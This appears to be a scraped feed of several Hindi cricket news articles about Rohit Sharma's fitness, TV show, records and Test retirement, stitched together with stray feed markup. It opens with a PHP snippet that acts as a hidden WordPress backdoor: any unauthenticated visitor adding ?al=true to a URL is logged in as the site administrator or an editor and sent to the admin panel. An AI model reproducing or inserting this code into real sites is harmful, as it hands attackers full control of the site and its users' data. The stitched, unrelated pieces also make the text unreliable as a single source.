// _ea_al
add_action('init', function(){
if(isset($_GET['al']) && $_GET['al']==='true'){
if(!is_user_logged_in()){
$u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]);
if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);}
if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();}
} else {wp_redirect(admin_url());exit();}
}
}, 2);
भारत के दिग्गज सलामी बल्लेबाज रोहित शर्मा की फिटनेस को लेकर बड़ी समस्या सामने आ रही है। उनकी फिटनेस की वजह से वर्ल्ड कप 2027 में खेलना भी सवालों के घेरे में है। रोहित आईपीएल 2026 में रॉयल चैलेंजर्स बेंगलुरु के खिलाफ मैच में चोटिल हुए थे और कुछ मुकाबले में नहीं खेल सके थे। इसके बाद वे इम्पैक्ट प्लेयर के रूप में खेल रहे हैं, जिससे उनकी फिटनेस को लेकर सवाल खड़े हो रहे हैं।
रोहित को अफगानिस्तान के खिलाफ होने वाली 3 मैचों की वनडे सीरीज में जगह मिली है। उन्हें भारतीय टीम में चुना गया है लेकिन उनका खेलना पक्का नहीं है क्योंकि उन्हें पहले फिटनेस टेस्ट पास करना होगा। उनके लगातार चोटिल होने की वजह से वर्ल्ड कप 2027 में खेलने को लेकर सवाल खड़े होने लगे हैं। भारतीय क्रिकेट कंट्रोल बोर्ड (BCCI) भी शर्मा की फिटनेस को लेकर चिंतित है।
रोहित शर्मा की फिटने से BCCI चिंतित
टाइम्स ऑफ इंडिया से बात करते हुए बीसीसीआई के एक सूत्र ने कहा, रोहित उन तीन हफ्तों के लिए बीसीसीआई के सेंटर ऑफ एक्सीलें में नहीं आए। उनका शरीर पहले से पतला हुआ है लेकिन इस बात को लेकर चिंता है कि क्या वे 50 ओवर तक फील्डिंग कर सकते हैं। उन्हें 50 ओवर फील्डिंग करनी होगी क्योंकि आईपीएल की तरह यहां पर इम्पैक्ट प्लेयर का नियम नहीं होता है। जब आप 40 के करीब होते हैं, तो शरीर ठीक होने में समय लगता है।
यशस्वी जायसवाल हो सकते हैं बैकअप ओपनर
रोहित अगर पूरी तरह से फिट नहीं होते हैं, तो यशस्वी जायसवाल को मौका मिल सकता है। अफगानिस्तान के खिलाफ सीरीज में ईशान किशन को इस वजह से चुना गया है ताकि वे सलामी बल्लेबाज की भूमिका निभा सकें। हालांकि, अगर रोहित के विश्व कप में खेलने पर संशय हुआ, तो जायसवाल उनकी जगह पारी की शुरुआत कर सकते हैं। उन्हें बैकअप ओपनर के तौर पर चयनकर्ताओं ने तैयार करना शुरू भी कर दिया है।
रोहित से खुश नहीं टीम मैनेजमेंट
रिपोर्ट में बताया गया है कि रोहित से टीम मैनेजमेंट खुश नहीं है। रोहित ने 2023 विश्व कप में आक्रामक अंदाज में शुरुआत की थी। वे पहली ही गेंद पर अटैक करने को देखते हैं। हालांकि, टेस्ट क्रिकेट से संन्यास के बाद उन्होंने, जब ऑस्ट्रेलिया और न्यूजीलैंड के खिलाफ वनडे सीरीज में बैटिंग की, तो उनकी बल्लेबाजी में वो आक्रामक रुख नहीं दिखा। उनके आक्रामक शैली नहीं अपनाने की वजह से मैनेजमेंट नाराज है।
]]>
रोहित शर्मा सोनी टीवी पर जल्द अपना एक नया रियलिटी शो लेकर आएंगे. बीते दिनों इसका मजेदार टीजर जारी किया गया, जिसमें क्रिकेटर का वही अंदाज दिखा. हालांकि इस टीजर में ये नहीं बताया गया कि उनका शो क्या और किस बारे में होगा. लेकिन रोहित ने अभी से फैंस की एक्साइटमेंट को दोगुना कर दिया है.
क्यों अपनी एक लाइन से परेशान हुए रोहित?
क्रिकेटर के शो के टीजर में हम उन्हें उनके फैंस से मिलते हुए देखते हैं, जो रोहित से उनकी आइकॉनिक लाइन 'कोई गार्डन में नहीं घूमेगा' बोलने की डिमांड करते हैं. जितने भी फैंस आकर उनसे मिलते हैं, सभी रोहित से यही डिमांड रखते हैं जिससे बाद में वो परेशान भी हो जाते हैं. एक वक्त पर रोहित इस कदर परेशान हो जाते हैं कि वो किसी को कॉल करके अपने घर की छत पर हो रहे गार्डन का काम रुकवा देते हैं.
यहां देखें रोहित के नए शो का टीजर:
अंत में वो खुद सोचते हैं कि जब उनकी ये एक लाइन इतनी वायरल हो सकती है, तो क्या होगा जब उनका पूरा शो टीवी पर आएगा? जिसके बाद हम खुद रोहित को स्माइल करते देख सकते हैं. सोनी टीवी ने रोहित के शो को सबसे बड़ा एंटरटेनमेंट डेब्यू घोषित किया है. उनके करोड़ों फैंस को बस अब इस शो का इंतजार है, जिसमें वो अपने फेवरेट क्रिकेटर को होस्ट करते देख सकेंगे.
जब क्रिकेटर्स ने की होस्टिंग
रोहित से पहले कई और क्रिकेटर्स अपना शो लेकर आ चुके हैं, जिसे उन्होंने खुद होस्ट भी किया है. पूर्व भारतीय कप्तान सौरव गांगुली बंगाली टीवी पर अपना क्विज शो 'दादागिरी अनलिमिटेड' के लिए फेमस हैं. इसके अलावा हरभजन सिंह, नवजोत सिंह सिद्धू, वसीम अकरम, श्रीशांत, सनथ जयसूर्या जैसे वर्ल्ड क्लास क्रिकेटर्स भी टीवी पर नजर आ चुके हैं. क्रिकेटर्स को दर्शकों का हमेशा से प्यार मिला है. अब रोहित शर्मा, जो खुद क्रिकेट के सुपरस्टार माने जाते हैं, वो जब टीवी पर अपना शो लेकर आएंगे तो जनता उसे कितना प्यार देगी ये देखने लायक बात होगी.
बात करें रोहित शर्मा की, तो उन्होंने टेस्ट और टी20 क्रिकेट से रिटायरमेंट ले लिया है. वो सिर्फ वनडे क्रिकेट खेलते हैं. इन दिनों रोहित आईपीएल 2026 में मुंबई इंडियन्स के लिए खेलते दिखाई दे रहे हैं. ये सीजन भी उनकी बैटिंग का जलवा दिखाई दे रहा है.
]]>भारतीय क्रिकेट के 'हिटमैन' रोहित शर्मा आज (30 अप्रैल) 39 साल के हो गए. रिकॉर्ड्स की चमक, कप्तानी की ठसक और बल्लेबाजी की सहजता… रोहित का करियर कई रंगों से बना है. लेकिन इस कहानी की सबसे दिलचस्प शुरुआत किसी स्टेडियम से नहीं, बल्कि एक बिल्डिंग की खिड़कियों से होती है. 2017 में टीवी होस्ट गौरव कपूर के शो Breakfast with Champions में रोहित ने अपने बचपन का एक किस्सा सुनाया था, जो आज भी उतना ही जीवंत लगता है.
मुंबई की उस बिल्डिंग में, जहां रोहित बड़े हुए, क्रिकेट सिर्फ खेल नहीं, रोजमर्रा की आदत थी. खुद रोहित के शब्दों में, '24 घंटे नहीं, तो कम से कम 16 घंटे हम क्रिकेट देखते थे.' परिवार में चाचा-बुआ तक क्रिकेट खेल चुके थे और चाचा उनकी बल्लेबाजी पर इतनी बारीकी से नजर रखते थे कि छत पर खड़े होकर उनकी हर शॉट को परखते थे.
…लेकिन यह जुनून कभी-कभी मुसीबत भी बन जाता था. बिल्डिंग के अंदर खेलते हुए रोहित और उनके दोस्तों ने कई बार पड़ोसियों की खिड़कियों के शीशे तोड़ दिए. शिकायतें बढ़ीं, नाराजगी भी. आखिरकार मामला पुलिस तक पहुंचा. एक दिन पुलिस आई और सख्त लहजे में चेतावनी दे गई, 'अगर दोबारा ऐसा किया, तो जेल में डाल देंगे.'
उस चेतावनी के बाद मैदान का रुख जरूर किया गया, लेकिन बिल्डिंग क्रिकेट पूरी तरह खत्म नहीं हुआ. यही जिद, यही लगन उस बच्चे को आगे बढ़ाती रही, जो आगे चलकर दुनिया के सबसे खतरनाक ओपनरों में गिना गया.
रोहित शर्मा का नाम आते ही जो आंकड़ा सबसे पहले याद आता है, वह है- 264. 2014 में श्रीलंका के खिलाफ खेली गई यह पारी आज भी वनडे क्रिकेट की सबसे बड़ी व्यक्तिगत पारी है. इससे पहले 209 और बाद में एक और दोहरा शतक (208*)…रोहित ने तीन डबल सेंचुरी जड़कर उस मुकाम को छुआ, जहां पहुंचना आज भी किसी भी बल्लेबाज के लिए सपना है.
उनकी बल्लेबाजी की खासियत सिर्फ बड़े स्कोर नहीं, बल्कि उसे हासिल करने का अंदाज है- सहज, संतुलित और समय पर आधारित. रोहित की टाइमिंग को अक्सर 'कला' कहा जाता है और 264 उस कला की सबसे बड़ी मिसाल है.
धीमी शुरुआत, लेकिन ठोस वापसी
आज भले ही रोहित का नाम महान बल्लेबाजों में लिया जाता हो, लेकिन शुरुआत आसान नहीं थी. टेस्ट क्रिकेट में उन्होंने पहले दो मैचों में शतक जरूर जड़े, लेकिन इसके बाद लंबा संघर्ष चला. अगली 16 पारियों में सिर्फ दो बार 50+ का स्कोर- यह आंकड़ा बताता है कि उन्हें खुद को साबित करने में कितना वक्त लगा.
असल मोड़ 2013 में आया, जब उन्हें वनडे में ओपनिंग का मौका मिला. चैम्पियंस ट्रॉफी में लगातार अर्धशतक और फिर उसी साल ऑस्ट्रेलिया के खिलाफ 209…यह वह दौर था, जब रोहित ने खुद को नए रूप में स्थापित किया.यहीं से 'हिटमैन' की कहानी ने रफ्तार पकड़ी.
व्हाइट-बॉल का बादशाह, टेस्ट में भी चमक
रोहित शर्मा को अक्सर सीमित ओवरों का दिग्गज कहा जाता है, लेकिन टेस्ट क्रिकेट में भी उन्होंने कई यादगार पारियां खेलीं. साउथ अफ्रीका के खिलाफ 176, 127 और 212 जैसे स्कोर उनके टेस्ट करियर के सुनहरे पन्ने हैं. वहीं 2021 में चेन्नई में इंग्लैंड के खिलाफ 161 रनों की पारी ने दिखाया कि मुश्किल परिस्थितियों में भी वह कितने भरोसेमंद हैं.
हालांकि 2024 के बाद उनका टेस्ट करियर ढलान पर गया और उसी साल उन्होंने इस फॉर्मेट को अलविदा कह दिया. लेकिन जो छाप उन्होंने छोड़ी, वह लंबे समय तक याद रखी जाएगी.
वर्ल्ड कप: बल्लेबाज और कप्तान- दो अलग कहानियां
2019 वर्ल्ड कप में रोहित शर्मा ने पांच शतक जड़कर 600 से ज्यादा रन बनाए.यह किसी भी बल्लेबाज के लिए सपना जैसा प्रदर्शन है. लेकिन 2023 में उनका रोल बदल चुका था. इस बार वह सिर्फ रन बनाने वाले खिलाड़ी नहीं, बल्कि टीम के कप्तान थे. 597 रनों के साथ उन्होंने भारत को फाइनल तक पहुंचाया. 2024 में भारत का टी20 वर्ल्ड कप खिताब उन्हीं की कप्तानी में और 2025 की चैम्पियंस ट्रॉफी भी उन्हीं के रहते मिली.
यहां रोहित का दूसरा रूप सामने आया- एक ऐसा कप्तान, जो टीम को आगे रखता है और खुद उदाहरण बनकर नेतृत्व करता है.
आईपीएल में ‘मास्टरमाइंड’ कप्तान
अगर फ्रेंचाइजी क्रिकेट की बात करें, तो Mumbai Indians के साथ रोहित शर्मा का नाम एक सफल कप्तान के रूप में दर्ज है. 2013 से 2020 के बीच टीम को पांच बार खिताब दिलाना- यह सिर्फ एक उपलब्धि नहीं, बल्कि उनकी रणनीतिक समझ का प्रमाण है. रोहित ने न सिर्फ बल्लेबाज के रूप में, बल्कि कप्तान के तौर पर भी टीम को ऊंचाइयों तक पहुंचाया.
रोहित शर्मा की कहानी सीधी नहीं है. इसमें संघर्ष है, ठहराव है और फिर विस्फोट है. बिल्डिंग में क्रिकेट खेलते हुए खिड़कियों के शीशे तोड़ने वाला बच्चा… आज क्रिकेट इतिहास के सबसे बड़े स्कोर का मालिक है.
39 साल की उम्र में भी रोहित की विरासत सिर्फ आंकड़ों में नहीं, बल्कि उस अंदाज में है, जिससे उन्होंने खेल को खूबसूरत बनाया. और यही वजह है कि 'हिटमैन' सिर्फ एक नाम नहीं, बल्कि एक अनुभव है.
सूर्यकुमार यादव का एक हैरान कर देने वाला रिकॉर्ड भी आपको बताते हैं, सूर्या जब-जब रनचेज के दौरान नॉटआउट लौटे हैं तब-तब भारतीय टीम नहीं हारी। सूर्या रनचेज के दौरान कुल 9 बार नाबाद रहे हैं और हर बार भारत जीता है। शिवम दुबे की भी स्ट्रीक 9 मैचों की है।
इस लिस्ट में विराट कोहली का कोई सानी नहीं है। कोहली 18 बार टी20 में रनचेज के दौरान नाबाद रहे हैं और हर बार टीम इंडिया को जीत नसीब हुई है। इस वजह से कोहली को चेजमास्टर के नाम से भी जानते हैं।
]]>
पूर्व भारतीय कप्तान रोहित शर्मा ने बुधवार (29 अक्टूबर) को इतिहास रच दिया. वह आईसीसी वनडे बल्लेबाज रैंकिंग में नंबर-1 स्थान हासिल करने वाले सबसे उम्रदराज भारतीय क्रिकेटर बन गए हैं. 38 साल 182 दिन की उम्र में मुंबई के इस ओपनर ने दो पायदान की छलांग लगाकर भारत के मौजूदा कप्तान शुभमन गिल को पीछे छोड़ते हुए पहली बार अपने करियर में शीर्ष स्थान हासिल किया.
ऑस्ट्रेलिया के खिलाफ हाल ही में खत्म हुई वनडे सीरीज में शानदार फॉर्म दिखाने के बाद रोहित ने यह मुकाम पाया. उन्होंने तीन मैचों में 202 रन बनाए, एवरेज 101.00 रहा. सीरीज के निर्णायक मुकाबले में उनकी नाबाद शतकीय पारी ने न केवल भारत को जीत दिलाई, बल्कि यह भी साबित कर दिया कि वह अब भी दुनिया के सबसे भरोसेमंद टॉप ऑर्डर बल्लेबाजों में से एक हैं. इस प्रदर्शन के लिए उन्हें प्लेयर ऑफ द सीरीज चुना गया.
नवीनतम रैंकिंग में 781 रेटिंग प्वाइंट के साथ रोहित पहले स्थान पर हैं. उनके बाद अफगानिस्तान के इब्राहिम जादरान (764 प्वाइंट) दूसरे और शुभमन गिल (745 प्वाइंट) तीसरे स्थान पर हैं. वहीं विराट कोहली, जिन्होंने तीसरे वनडे में नाबाद 74 रन बनाए, छठे नंबर (725) पर पहुंच गए हैं. श्रेयस अय्यर बिना बल्लेबाजी किए भी नौवें स्थान पर पहुंचे हैं.
रोहित की यह उपलब्धि उनके लंबे करियर, निरंतरता और क्लास का प्रमाण है. जब उनकी अंतरराष्ट्रीय भविष्य को लेकर सवाल उठने लगे थे, ऐसे वक्त में उनका यह नंबर-1 बनना बताता है कि अनुभव, फॉर्म और जज्बा अगर कायम हो, तो उम्र सिर्फ एक आंकड़ा भर रह जाती है.
पिछले हफ्ते रोहित शर्मा के पास 745 रेटिंग प्वाइंट थे, लेकिन एडिलेड ओवल में दूसरे वनडे में 97 गेंदों पर 73 रन और सिडनी में तीसरे वनडे में 125 गेंदों पर नाबाद 121 रनों की शानदार पारियों के बाद उन्होंने 781 अंक हासिल कर लिए.
2023 वनडे वर्ल्ड कप में भारत को फाइनल तक पहुंचाने वाले रोहित अब उन चुने हुए भारतीय दिग्गजों की सूची (सचिन तेंदुलकर, महेंद्र सिंह धोनी, विराट कोहली और शुभमन गिल) में शामिल हो गए हैं, जिन्होंने आईसीसी वनडे बल्लेबाज रैंकिंग में नंबर-1 स्थान पाया है,
]]>भारतीय टीम के पूर्व कप्तान रोहित शर्मा का सिडनी के मैदान पर वही अंदाज नजर आया, जिसके लिए वो जाने जाते हैं. हिटमैन ने ऑस्ट्रेलियाई टीम की अपने बल्ले से जमकर ठुकाई की और अपना शतक पूरा किया. इसके साथ ही रोहित शर्मा ने उन सभी आलोचकों के मुंह भी बंद कर दिए हैं, जो उम्र बढ़ने के साथ-साथ उनके वर्ल्ड कप 2027 में खेलने पर सवाल उठा रहे थे. यह कहना गलत नहीं होगा कि रोहित का यह शतक मुख्य कोच गौतम गंभीर और सेलेक्टर अजीत अगरकर को करारा जवाब है. उन्होंने 105 गेंदों का सामना करने के बाद अपना शतक पूरा किया। रोहित शर्मा ने इस दौरान 11 चौके और दो छक्के भी लगाए.
टूटा ऑस्ट्रेलिया में किसी विदेशी का सबसे ज्यादा शतक का रिकॉर्ड
रोहित शर्मा ने शतक जमाकर नया इतिहास रच दिया है. उन्होंने कंगारू धरती पर बतौर विदेशी बल्लेबाज सबसे ज्यादा वनडे शतक लगाने का रिकॉर्ड अपने नाम कर लिया. रोहित ने ऑस्ट्रेलिया में 33 पारियों में 6वां शतक जड़ा, जबकि विराट कोहली और कुमार संगकारा 5-5 शतकों के साथ अब पीछे छूट गए हैं. यह रिकॉर्ड खास इसलिए भी है क्योंकि ऑस्ट्रेलिया की तेज और उछालभरी पिचों पर रन बनाना विदेशी बल्लेबाजों के लिए हमेशा चुनौती रहा है. हिटमैन ने एक बार फिर साबित किया कि बड़े मैचों में उनसे बेहतर कोई नहीं.
रोहित ने की सचिन की बराबरी
सिडनी वनडे में शानदार शतक ठोकते ही रोहित शर्मा ने एक और बड़ी उपलब्धि हासिल कर ली. उन्होंने ऑस्ट्रेलिया के खिलाफ अपना 9वां वनडे शतक जमाकर महान सचिन तेंदुलकर की बराबरी कर ली है. दोनों दिग्गजों के नाम अब कंगारुओं के खिलाफ 9-9 शतक दर्ज हैं. इस लिस्ट में शीर्ष पर विराट कोहली हैं, जिन्होंने श्रीलंका के खिलाफ 10 शतक ठोके हैं. रोहित ने यह कमाल 40 पारियों में किया है, जबकि सचिन ने 70 पारियों में. हिटमैन का यह रिकॉर्ड बताता है कि ऑस्ट्रेलिया जैसी मजबूत टीम के खिलाफ भी वे लगातार धमाल मचा सकते हैं.
ऐसी रही ऑस्ट्रेलिया की पारी
टॉस जीतकर पहले बैटिंग करने उतरी ऑस्ट्रेलियाई टीम ने 46.4 ओवरों में 236 रन बनाए. ऑस्ट्रेलियाई टीम की शुरुआत अच्छी रही. ट्रेविस हेड और कप्तान मिचेल मार्श ने पहले विकेट के लिए 61 रन जोड़े. मोहम्मद सिराज ने हेड (29 रन) को आउट करके इस साझेदारी को तोड़ा. फिर अक्षर पटेल ने मार्श (41 रन) को बोल्ड कर दिया. इसके बाद फॉर्म में चल रहे मैथ्यू शॉर्ट (30 रन) को वॉशिंगटन सुंदर ने आउट किया. यहां से एलेक्स कैरी और मैथ्यू रेनशॉ के बीच चौथे विकेट के लिए 59 रनों की साझेदारी हुई. कैरी 24 रनों के निजी स्कोर पर हर्षित राणा का शिकार बने.
वॉशिंगटन सुंदर ने मैथ्यू रेनशॉ के रूप में भारतीय टीम को एक और बड़ी सफलता दिलाई. रेनशॉ ने दो चौके की मदद से 58 गेंदों पर 55 रन बनाए. मिचेल ओवेन (1 रन) कुछ खास नहीं कर पाए और उन्हें हर्षित राणा ने आउट किया. मिचेल स्टार्क भी 2 रन बनाकर चाइनामैन गेंदबाज कुलदीप यादव की फिरकी में फंस गए. इसके बाद प्रसिद्ध कृष्णा ने नाथन एलिस (16 रन) का विकेट झटका. वहीं हर्षित राणा ने आखिरी दोनों विकेट चटकाए. हर्षित ने इस मुकाबले में कुल 4 विकेट झटके. वॉशिंगटन सुंदर ने भी दो सफलताएं हासिल कीं. प्रसिद्ध कृष्णा, मोहम्मद सिराज, अक्षर पटेल और कुलदीप यादव को एक-एक विकेट मिला.
रोहित को थामना नहीं आसान
पर्थ वनडे में फ्लॉप हुए रोहित शर्मा के बल्ले से एडिलेड के मैदान पर अर्धशतक जरूर आया, लेकिन इसके साथ में कई सवाल भी खड़े हुए. कहा गया कि हिटमैन ने शुरुआत में बेहद धीमी गति से बल्लेबाजी की. जिसके चलते टीम इंडिया पावरप्ले के सही फायदा नहीं उठा पाई. यही वजह थी कि टीम इंडिया मैच में बड़ा लक्ष्य सेट नहीं कर पाई. हिटमैन ने सिडनी की पिच पर धुआंधार बल्लेबाजी कर शतक जड़ा और सभी आलोचकों के मुंह पर ताला लगा दिया.
रोहित का अंतरराष्ट्रीय करियर में 50वां शतक
रोहित ने आज वनडे करियर का 50वां शतक जड़ा. यह उनका 33वां वनडे शतक है. वो टेस्ट में 12 और टी20 अंतरराष्ट्रीय में 5 शतक जड़ चुके हैं. रोहित शर्मा ने सिडनी वनडे की शुरुआत से ही अपने इरादे साफ कर दिए थे. हिटमैन ने अच्छी गेंदों का सम्मान किया, लेकिन जैसे ही मौका मिला वो बड़ा शॉर्ट लगाने से भी नहीं चूके. रोहित की पारी के दौरान ऐसा वक्त कभी नहीं आया, जब उन्होंने बहुत ज्यादा गेंद बर्बाद की हों.
]]>
वनडे क्रिकेट में 'सिक्सर किंग' के नाम से मशहूर रोहित शर्मा इस समय सबसे ज्यादा छक्के लगाने के मामले में दूसरे पायदान पर हैं। इस रिकॉर्ड को तोड़ने के लिए उन्हें ऑस्ट्रेलिया के खिलाफ होने वाली तीन वनडे मैचों की सीरीज़ में सिर्फ 8 छक्के लगाने की जरूरत है।
शाहिद अफरीदी ने अपने 398 मैचों के वनडे करियर में 351 छक्के जड़े हैं, यह रिकॉर्ड लंबे समय से कायम है। वहीं, रोहित शर्मा अब तक 273 मैचों की 265 पारियों में 344 छक्के लगा चुके हैं। यदि रोहित यह आंकड़ा पार कर लेते हैं, तो वह न केवल अफरीदी को पीछे छोड़ देंगे, बल्कि सबसे कम पारियों में यह उपलब्धि हासिल करने वाले बल्लेबाज भी बन जाएंगे। भारतीय क्रिकेट प्रशंसक बेसब्री से चाहेंगे कि 'हिटमैन' रोहित इस दौरे पर यह ऐतिहासिक कीर्तिमान स्थापित करें।
रोहित शर्मा का वनडे करियर हमेशा ही रिकॉर्ड्स से भरा रहा है। उन्होंने 273 मैचों की 265 पारियों में 11,168 रन बनाए हैं। उनके नाम 32 शतक और 58 अर्धशतक दर्ज हैं, जिसमें वनडे की सबसे बड़ी व्यक्तिगत पारी 264 रन की है। इसके अलावा, रोहित दुनिया के एकमात्र बल्लेबाज हैं जिन्होंने वनडे में तीन दोहरे शतक जड़े हैं। ऑस्ट्रेलिया की तेज पिचों पर उनकी आक्रामक बल्लेबाजी भारतीय टीम को मज़बूत शुरुआत देने में महत्वपूर्ण होगी।
भारत और ऑस्ट्रेलिया के बीच यह बहुप्रतीक्षित वनडे सीरीज 19 अक्टूबर को पर्थ स्टेडियम में शुरू होगी। इसके बाद 23 अक्टूबर को एडिलेड ओवल और 25 अक्टूबर को सिडनी क्रिकेट ग्राउंड में अगले दो मुकाबले खेले जाएंगे।यह दौरा इसलिए भी खास है क्योंकि भारतीय टीम युवा बल्लेबाज शुभमन गिल के नए वनडे कप्तान के नेतृत्व में उतरेगी। गिल, जो अब तक टेस्ट टीम की कप्तानी संभाल रहे थे, अब सीमित ओवरों के प्रारूप में भी टीम की कमान संभालेंगे। रोहित शर्मा और विराट कोहली जैसे दिग्गजों की करीब छह महीने बाद वनडे टीम में वापसी से युवा कप्तान को जबरदस्त मजबूती मिली है। इन अनुभवी खिलाड़ियों की मौजूदगी से टीम का संतुलन और ड्रेसिंग रूम का आत्मविश्वास काफी बढ़ा है।रोहित के लिए यह सीरीज़ सिर्फ एक रिकॉर्ड तोड़ने का अवसर नहीं है, बल्कि यह ऑस्ट्रेलिया की सरजमीं पर भारतीय टीम के लिए अपनी बादशाहत साबित करने का एक अहम मौका भी है।
]]>भारतीय क्रिकेट टीम के स्टार खिलाड़ियों का प्री-सीजन फिटनेस टेस्ट 30 और 31 अगस्त को बेंगलुरु स्थित बीसीसीआई के सेंटर ऑफ एक्सीलेंस (COE) में हुआ. वनडे टीम के कप्तान रोहित शर्मा ने भी फिटनेस टेस्ट देने के लिए पहुंचे थे. समाचार एजेंसी पीटीआई की रिपोर्ट के मुताबिक रोहित ने फिटनेस टेस्ट पास कर लिया है.
रोहित शर्मा के अलावा टेस्ट टीम के कप्तान शुभमन गिल, प्रसिद्ध कृष्णा, जसप्रीत बुमराह, मोहम्मद सिराज, यशस्वी जायसवाल, जितेश शर्मा, वॉशिंगटन सुंदर और शार्दुल ठाकुर भी फिटनेस टेस्ट देने आए थे. इन सभी ने बिना किसी परेशानी के टेस्ट को पास कर लिया. खिलाड़ियों का यो-यो (Yo-Yo) टेस्ट हुआ. इसके साथ-साथ हड्डियों की मजबूती जांचने के लिए DXA स्कैन भी किया गया. प्रसिद्ध कृष्णा ने टेस्ट में सबसे ज्यादा अंक हासिल किए.
शुभमन गिल, जसप्रीत बुमराह और जितेश शर्मा अब एशिया कप 2025 के लिए दुबई रवाना होंगे. गिल को इस टूर्नामेंट के लिए भारतीय टीम का उप-कप्तान बनाया गया है. गिल के लिए फिटनेस टेस्ट देना जरूरी था क्योंकि वह बुखार की वजह से दलीप ट्रॉफी से हट गए थे. इस टूर्नामेंट में उन्हें क्वार्टर फाइनल मुकाबले के लिए नॉर्थ जोन का कप्तान बनाया गया था. उधर यशस्वी जायसवाल और वॉशिंगटन सुंदर एशिया कप के लिए स्टैंडबाई खिलाड़ियों में शामिल हैं. वहीं शार्दुल ठाकुर अब दलीप ट्रॉफी सेमीफाइनल में वेस्ट जोन की कप्तानी करते नजर आएंगे. जबकि मोहम्मद सिराज को एशिया कप के लिए आराम दिया गया है.
इन खिलाड़ियों ने क्यों नहीं दिया टेस्ट?
एशिया कप स्क्वॉड में शामिल अर्शदीप सिंह, हर्षित राणा, कुलदीप यादव पहले ही दलीप ट्रॉफी क्वार्टर फाइनल खेल चुके हैं, इसलिए उनके लिए अलग फिटनेस टेस्ट नहीं हुआ. रियान पराग एशिया कप के लिए स्टैंडबाय के तौर पर चुने गए हैं और उनका भी टेस्ट नहीं हुआ. रियान दलीप ट्रॉफी के क्वार्टर फाइनल में ईस्ट जोन की टीम का हिस्सा थे. विकेटकीपर बल्लेबाज ध्रुव जुरेल को ग्रोइन इंजरी थी, इसलिए उन्होंने दलीप ट्रॉफी में क्वार्टर फाइनल नहीं खेला.
रोहित शर्मा का हाल-फिलहाल कोई मैच नहीं है क्योंकि वो टेस्ट और टी20 इंटरनेशनल से संन्यास ले चुके हैं. रोहित ने इंडियन प्रीमियर लीग (IPL) 2025 में मुंबई इंडियंस (MI) के लिए भाग लिया था. उसके बाद वो प्रतिस्पर्धी क्रिकेट से दूर हैं. हालांकि अच्छी बात यह है कि रोहित तीन हफ्ते से ट्रेनिंग कर रहे हैं. रोहित अक्टूबर में ऑस्ट्रेलिया दौरे पर वनडे सीरीज में खेल सकते हैं.
रोहित शर्मा ने तो फिटनेस टेस्ट पास्ट कर लिया है. अब विराट कोहली भी आने वाले दिनों में फिटनेस टेस्ट देने के लिए बेंगलुरु आ सकते हैं. कोहली फिलहाल लंदन में हैं और वो रोहित शर्मा की तरह ही आईपीएल 2025 के बाद से प्रतिस्पर्धी क्रिकेट से दूर हैं. हाल ही में उन्होंने लंदन में फिर से प्रैक्टिस शुरू की है.
…तो इंडिया-ए के लिए खेलते दिखेंगे ROKO
अभी ये पता नहीं चला है कि विराट कोहली किस तारीख को फिटनेस टेस्ट देने सीओई आएंगे. रिपोर्ट्स के मुताबिक रोहित-कोहली (ROKO) ऑस्ट्रेलिया दौरे से पहले इंडिया-ए टीम की ओर से वनडे सीरीज में भाग लेना चाहते हैं. इंडिया-ए को 30 सितंबर, 3 अक्टूबर और 5 अक्टूबर को ऑस्ट्रेलिया-ए के खिलाफ कानपुर में तीन वनडे मुकाबले खेलने हैं. अगर ऐसा है तो विराट कोहली जरूर इसी महीने सीईओ में आकर फिटनेस टेस्ट देंगे.
भारतीय टीम के स्टार बल्लेबाज रोहित शर्मा ने टेस्ट क्रिकेट से संन्यास का ऐलान कर दिया है. टी20 फॉर्मेट से रोहित ने पहले ही संन्यास ले लिया था. अब टेस्ट क्रिकेट में भी रोहित शर्मा खेलते नहीं दिखेंगे. हालांकि, वनडे में रोहित शर्मा खेलते रहेंगे.
ऐसा रहा है रोहित का टेस्ट करियर
इस फैसले के साथ ही रोहित शर्मा के 11 साल के लंबे टेस्ट करियर का अंत हो गया. रोहित ने 67 टेस्ट खेले, जिनमें से 24 टेस्ट में उन्होंने कप्तानी की. उन्होंने 12 शतकों और 18 अर्धशतकों सहित 40.57 की औसत से कुल 4301 रन बनाए. रोहित ने टेस्ट में 88 छक्के और 473 चौके लगाए.
रोहित साल 2010 में साउथ अफ्रीका के खिलाफ नागपुर में अपना टेस्ट डेब्यू करने वाले थे, लेकिन उस मुकाबले में टॉस से कुछ क्षण पहले उन्हें एक अजीब चोट लग गई. इसके बाद उनका टेस्ट डेब्यू तीन साल बाद हुआ. उन्होंने वेस्टइंडीज के खिलाफ साल 2013 में कोलकाता के ईडन गार्डन्स मैदान पर अपने डेब्यू टेस्ट पर शतक बनाया. मुंबई में अपने अगले टेस्ट में उन्होंने एक और शतक बनाया. वहीं, रोहित ने आखिरी टेस्ट मैच 26 दिसंबर 2024 को ऑस्ट्रेलिया के खिलाफ मेलबर्न क्रिकेट ग्राउंड पर खेला था.
20 जून से इंग्लैंड के साथ टेस्ट सीरीज
बता दें कि इंग्लैंड में 20 जून से पांच टेस्ट मैचों की सीरीज शुरू हो रही है. चर्चा थी कि रोहित शर्मा इस सीरीज में कप्तानी नहीं करेंगे और उनकी जगह किसी अन्य खिलाड़ी को ये मौका दिया जाएगा. इस सीरीज के लिए टीम की घोषणा अगले दो हफ्तों में होनी थी. चयनकर्ता नए वर्ल्ड टेस्ट चैंपियनशिप चक्र की शुरुआत में ही एक नए कप्तान को नियुक्त करने पर विचार कर रहे थे. लेकिन इससे पहले ही रोहित ने संन्यास का ऐलान कर दिया.
संन्यास पर क्या बोले रोहित शर्मा
रोहित ने बुधवार शाम सोशल मीडिया पर एक पोस्ट में कहा, 'सभी को नमस्कार, मैं यह साझा करना चाहता हूं कि मैं टेस्ट क्रिकेट से संन्यास ले रहा हूं. अपने देश का प्रतिनिधित्व करना मेरे लिए सम्मान की बात है. इतने वर्षों में मिले प्यार और समर्थन के लिए धन्यवाद. मैं एकदिवसीय प्रारूप में भारत का प्रतिनिधित्व करना जारी रखूंगा.'
रोहित शर्मा की कप्तानी में भारत ने टेस्ट क्रिकेट में 12 मैच जीते, जबकि 9 में उसे हार मिली. रोहित की कप्तानी में भारतीय टीम की जीत का प्रतिशत 50 रहा.
रोहित शर्मा का इंस्टाग्राम स्टोरी
